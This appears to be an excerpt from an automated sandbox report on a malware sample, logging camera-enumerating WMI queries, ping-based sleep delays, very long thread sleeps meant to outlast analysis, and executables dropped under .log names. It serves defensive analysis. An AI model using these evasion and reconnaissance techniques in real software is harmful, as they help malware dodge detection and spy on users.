Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: 1060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: 1830000 memory reserve \| memory write watch
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: 1B290000 memory reserve \| memory write watch
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: F40000 memory reserve \| memory write watch
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: EE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: 1AA40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: 1B4C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Memory allocated: 1A570000 memory reserve \| memory write watch

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 599852
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 3600000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596142
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595052
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594791
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593531
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593306
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593172
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592759
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592651
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592461
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592359
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592247
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592137
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592031
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591921
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591800
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591672
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591560
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591453
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591344
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591234
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591125
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591015
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590906
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590787
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590656
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590042
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589937
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589827
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589719
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589604
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589497
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589389
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9139	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9393	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Window / User API: threadDelayed 4415
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Window / User API: threadDelayed 5286

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uznrhtzR.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\utIZHXKr.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\foddJTjY.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pXxtswpF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QARGDIci.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NcCXpyPJ.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WFKNZreq.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cnLmOXeC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BxbrKIuG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aQOwrfcH.log	Jump to dropped file

Source: C:\Bridgecontainerserver\BrokerhostNet.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728	Thread sleep count: 9139 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728	Thread sleep count: 297 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5804	Thread sleep count: 9393 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe TID: 7372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Bridgecontainerserver\BrokerhostNet.exe TID: 7360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 3688	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -599852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 3052	Thread sleep time: -14400000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 3052	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -596142s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -595052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594791s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -594078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593306s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -593172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592651s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592461s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592137s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -592031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591921s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591800s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591344s >= -30000s
